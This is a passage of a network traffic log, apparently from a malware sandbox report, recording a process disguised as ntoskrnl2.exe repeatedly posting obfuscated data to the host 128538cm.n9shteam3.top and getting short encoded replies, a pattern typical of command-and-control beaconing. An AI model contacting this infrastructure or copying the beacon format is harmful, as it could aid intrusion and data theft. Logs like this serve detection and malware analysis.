                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:37.402683973 CEST1028OUTData Raw: 50 56 5a 57 5e 45 59 51 5b 5f 56 5a 57 5b 50 5e 55 59 5e 43 50 5e 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZW^EYQ[_VZW[P^UY^CP^ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$2&=8'"0Y<Z,$]',(8V)$+*%-:%^./]+0
                                                            Sep 2, 2024 13:34:37.696208000 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:37.822103024 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            59192.168.2.64980680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:37.959026098 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:38.306097984 CEST1028OUTData Raw: 50 56 5a 53 5e 46 59 54 5b 5f 56 5a 57 5c 50 5d 55 5a 5e 45 50 59 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZS^FYT[_VZW\P]UZ^EPYZ_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'019Y<8/]$"3X->=8]8$83,!T(;*B8>!:\.:%^./]+,
                                                            Sep 2, 2024 13:34:38.677062988 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:38.725670099 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            60192.168.2.64980780.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:38.901597977 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:39.260658026 CEST1028OUTData Raw: 55 57 5f 54 5b 41 59 53 5b 5f 56 5a 57 5c 50 53 55 5e 5e 45 50 5f 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UW_T[AYS[_VZW\PSU^^EP_Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!+8%!9_$>%?7;B;0%R+'=';=!-9%^./]+,
                                                            Sep 2, 2024 13:34:39.569981098 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:39.697087049 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            61192.168.2.64980880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:39.855004072 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:40.218219042 CEST1028OUTData Raw: 50 51 5f 53 5e 42 5c 50 5b 5f 56 5a 57 59 50 5b 55 5f 5e 49 50 53 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQ_S^B\P[_VZWYP[U_^IPSZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'01!^(+X31)%.(#;0]'%?+?=0>:9%^./]+8
                                                            Sep 2, 2024 13:34:40.522284985 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:40.651228905 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            62192.168.2.64980980.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:40.972548008 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:41.324354887 CEST1028OUTData Raw: 50 56 5f 54 5e 47 5c 50 5b 5f 56 5a 57 55 50 5e 55 59 5e 46 50 5c 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PV_T^G\P[_VZWUP^UY^FP\ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y3">=8;$2*'.?-[;$3<>?+8*<)W=/:%^./]+
                                                            Sep 2, 2024 13:34:41.636584044 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:41.762834072 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            63192.168.2.64981080.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:41.892365932 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:42.247843027 CEST1028OUTData Raw: 55 5e 5a 5e 5b 44 5c 50 5b 5f 56 5a 57 59 50 5a 55 5d 5e 42 50 59 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^Z^[D\P[_VZWYPZU]^BPYZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''=_?8#0"60.Y<=,,4$<!W(+,)*15-*%^./]+8
                                                            Sep 2, 2024 13:34:42.562072992 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:42.694101095 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            64192.168.2.64981180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:41.933526993 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:42.319852114 CEST1340OUTData Raw: 55 57 5a 5e 5e 49 59 56 5b 5f 56 5a 57 5a 50 5e 55 51 5e 46 50 5e 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZ^^IYV[_VZWZP^UQ^FP^ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'['9]?+;02%Z'.">=,;'/!R< >')/:%^./]+
                                                            Sep 2, 2024 13:34:42.582245111 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:42.800107956 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0e 23 1a 23 56 26 15 2c 5e 2b 2a 35 06 3f 3d 34 43 2d 11 0d 03 30 3a 3f 5f 28 54 2d 1a 25 07 35 5c 29 2c 08 02 2b 0b 2d 55 21 24 20 5b 03 1f 25 5c 23 31 25 0f 25 2b 3a 00 27 37 2e 1b 35 37 0d 07 2a 04 25 0a 25 3e 3b 01 23 57 31 09 2f 3e 21 08 25 2b 20 59 3a 2f 2a 1b 24 2e 2a 56 08 16 38 1d 28 12 04 5f 20 0e 3c 01 23 28 3a 0f 20 40 24 0f 30 33 20 0e 27 39 39 53 25 2d 38 0e 28 2d 02 07 24 00 39 5b 37 33 39 52 3a 13 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ###V&,^+*5?=4C-0:?_(T-%5\),+-U!$ [%\#1%%+:'7.57*%%>;#W1/>!%+ Y:/*$.*V8(_ <#(: @$03 '99S%-8(-$9[739R:$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            65192.168.2.64981280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:42.855070114 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:43.212337971 CEST1028OUTData Raw: 55 55 5a 50 5b 42 5c 57 5b 5f 56 5a 57 5f 50 59 55 51 5e 49 50 59 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UUZP[B\W[_VZW_PYUQ^IPYZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^0<_'T)0)<-$^,4$0!S+$T)$(_>99%^./]+
                                                            Sep 2, 2024 13:34:43.511909962 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:43.727143049 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            66192.168.2.64981380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:43.870357990 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:44.228072882 CEST1028OUTData Raw: 50 53 5a 50 5e 40 5c 51 5b 5f 56 5a 57 54 50 58 55 5f 5e 42 50 53 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZP^@\Q[_VZWTPXU_^BPSZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'&!>=8/$:%-5(>8;B8'V*; W)B7)5/:%^./]+
                                                            Sep 2, 2024 13:34:44.639075041 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:44.639733076 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            67192.168.2.64981480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:44.779737949 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:45.134491920 CEST1024OUTData Raw: 55 57 5a 52 5e 43 59 5d 5b 5f 56 5a 57 5d 50 5d 55 59 5e 46 50 59 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZR^CY][_VZW]P]UY^FPYZ\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'09(4$T='\+#, 3,)S(8(7()&9:%^./]+
                                                            Sep 2, 2024 13:34:45.424245119 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:45.549455881 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            68192.168.2.64981580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:45.715205908 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:46.071882010 CEST1028OUTData Raw: 55 54 5a 50 5b 42 5c 51 5b 5f 56 5a 57 58 50 53 55 58 5e 40 50 5f 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZP[B\Q[_VZWXPSUX^@P_Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z'9+'^$%$>:]?.<\/$0>?+,V)$?!^.%^./]+<
                                                            Sep 2, 2024 13:34:46.379530907 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:46.508801937 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            69192.168.2.64981680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:46.641783953 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:46.993664980 CEST1028OUTData Raw: 50 55 5f 55 5b 45 59 57 5b 5f 56 5a 57 55 50 58 55 59 5e 40 50 5d 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_U[EYW[_VZWUPXUY^@P]ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'!)=;832"0>\<(;B8$9T<8*4$Z=!&X.*%^./]+
                                                            Sep 2, 2024 13:34:47.307096004 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:47.441076040 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            70192.168.2.64981780.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:47.575963974 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:47.934787035 CEST1028OUTData Raw: 55 51 5f 51 5b 46 59 50 5b 5f 56 5a 57 5f 50 5a 55 5d 5e 42 50 5a 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UQ_Q[FYP[_VZW_PZU]^BPZZ[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''1=8^$&$<;/B(Y3<V+; )()W5.%^./]+
                                                            Sep 2, 2024 13:34:48.229660034 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:48.353131056 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            71192.168.2.64981880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:47.813683033 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:48.167489052 CEST1340OUTData Raw: 55 56 5f 52 5b 44 5c 56 5b 5f 56 5a 57 58 50 5a 55 5d 5e 49 50 59 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UV_R[D\V[_VZWXPZU]^IPYZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y'-_<(,'T*0.(><];$40?8 V>3=!X-%^./]+<
                                                            Sep 2, 2024 13:34:48.471065044 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:48.601803064 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 56 23 1d 3f 50 31 5d 20 5b 3e 00 3a 5a 2b 03 0e 42 3a 11 20 59 24 39 24 07 3f 32 26 09 26 00 2d 13 29 2c 3d 5d 28 0b 39 11 36 0e 20 5b 03 1f 25 17 22 32 2d 0c 26 3b 3e 00 33 37 00 1b 20 37 27 06 3d 04 36 53 33 13 33 01 34 22 26 56 38 2d 00 50 25 01 34 12 2e 3c 22 14 31 3e 2a 56 08 16 38 56 29 2f 3a 5c 23 0e 24 05 37 01 39 56 37 18 20 0e 24 33 27 53 27 04 22 0e 25 2d 3c 09 28 2d 01 16 24 2a 2d 16 37 0d 2d 19 2d 13 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: V#?P1] [>:Z+B: Y$9$?2&&-),=](96 [%"2-&;>37 7'=6S334"&V8-P%4.<"1>*V8V)/:\#$79V7 $3'S'"%-<(-$*-7--$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            72192.168.2.64981980.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
